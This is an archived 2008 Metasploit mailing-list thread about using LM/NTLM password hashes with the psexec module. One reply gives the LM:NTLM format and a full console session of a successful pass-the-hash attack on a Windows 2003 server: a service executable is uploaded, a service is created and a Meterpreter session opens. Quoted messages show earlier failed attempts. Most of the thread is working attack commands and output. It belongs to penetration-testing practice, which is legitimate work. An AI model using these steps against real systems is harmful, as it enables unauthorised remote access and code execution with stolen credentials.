[framework] Using LM and NTLM Hashes with Metasploit's psexec

Kurt Grutzmacher grutz at jingojango.net
Sat Apr 12 11:24:54 CDT 2008 

The format is LM:NTLM and the only way the library knows is by looking for
two 32-byte characters separated with a colon. What was the source of the
hashes? Any pass-the-hash technique must have the direct PW->Hash result,
anything that has been encrypted further with a nonce won't work. Also,
NTLMv2 is not yet supported so your target must negotiate to NTLMv1.

I just tried it against a Win2K3 server green install without a problem:

msf exploit(psexec) > set SMBPass
6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
SMBPass => 6A98EB0FB88A449CBE6FABFD825BCA61:A4141712F19E9DD5ADF16919BB38A95C
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created \tCmiQnDv.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0 at ncacn_np:10.1.1.183[\svcctl]
...
[*] Obtaining a service manager handle...
[*] Creating a new service (iQjTupTr - "MniZYWPVdyZvaRRSNZZIGe")...
[*] Closing service handle...
[*] Opening service...

[*] You *MUST* manually remove the service: (iQjTupTr -
"MniZYWPVdyZvaRRSNZZIGe")
[*] You *MUST* manually delete the service file: %SYSTEMROOT%\tCmiQnDv.exe

[*] Starting the service...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (81931 bytes)...
[*] Upload completed.
[*] Error: no response from dcerpc service
[*] Meterpreter session 1 opened (10.1.1.55:38241 -> 10.1.1.183:5555)
msf exploit(psexec) >

Kurt

On Fri, Apr 11, 2008 at 8:21 PM, Mathew Brown <mathewbrown at fastmail.fm>
wrote:

> Hi HD,
>  Thank you for your reply, but I can't seem to get it to work.  Also,
>  where would I get the NTLM response from?  I currently have the LM and
>  NTLM hashes, not responses.  I tried setting it to the LM:NTLM hash
>  but it failed.  I then tried it with just the NTLM hash and it also
>  failed.  Finally, I tried it in the :NTLM: format and it failed.
>  Here's an example of what it tells me (the hash isn't really important
>  since it's a test machine):
>
> msf exploit(psexec) > set SMBPass
> ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
> SMBPass =>
> ::570ce399da1412abaad3b435851404ee:b9d2d4957b330b503cc792eb6a55bb1:::
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> msf exploit(psexec) > set SMBPass b9d2d4957b330b503cc792eb6a55bb1
> SMBPass => b9d2d4957b330b503cc792eb6a55bb1
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> msf exploit(psexec) > set SMBPass :b9d2d4957b330b503cc792eb6a55bb1f:
> msf exploit(psexec) > exploit
> [*] Started reverse handler
> [*] Connecting to the server...
> [*] Authenticating as user 'Administrator'...
> [-] Exploit failed: Login Failed: The server responded with error:
> STATUS_LOGON_FAILURE (Command=115 WordCount=0)
>
> Also, how would psexec differentiate between you sending it an NTLM hash
> to use for authentication and you sending it a password?  In the example
> above, what if my password was b9d2d4957b330b503cc792eb6a55bb1f?  How
> would psexec know that this was an NTLM hash and not a password?  Any
> ideas?  Thanks for your help.
>
> PS.  I'm currently running Metasploit v3.1.  After the failed attempts
> above, I verified that psexec works fine when I provide it with the real
> password and not the LM or NTLM hashes.
>
> > On Friday 11 April 2008, H D Moore wrote:
> > I think you can just set SMBPass to the NTLM response and call it done
> > (thanks grutz!).
> >
> > -HD
> >
> > On Friday 11 April 2008, Mathew Brown wrote:
> > > Hi,
> > >   After running info windows/smb/psexec in metasploit, it tells me:
> > >   "This module uses a valid administrator username and password (or
> > >   password hash) to execute an arbitrary payload."  I currently have
> > > the LM and NTLM hashes for a valid account on a remote machine but not
> > > the actual password.  How would I pass this information to the SMBPass
> > > variable.  Should I just put it as LM:HASH?  Thanks.
> > > --
> > >   Mathew Brown
> > >   mathewbrown at fastmail.fm
> --
>  Mathew Brown
>  mathewbrown at fastmail.fm
>
> --
> http://www.fastmail.fm - The professional email service
>
> _______________________________________________
> http://spool.metasploit.com/mailman/listinfo/framework
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://spool.metasploit.com/pipermail/framework/attachments/20080412/c5a73311/attachment.htm

More information about the Framework mailing list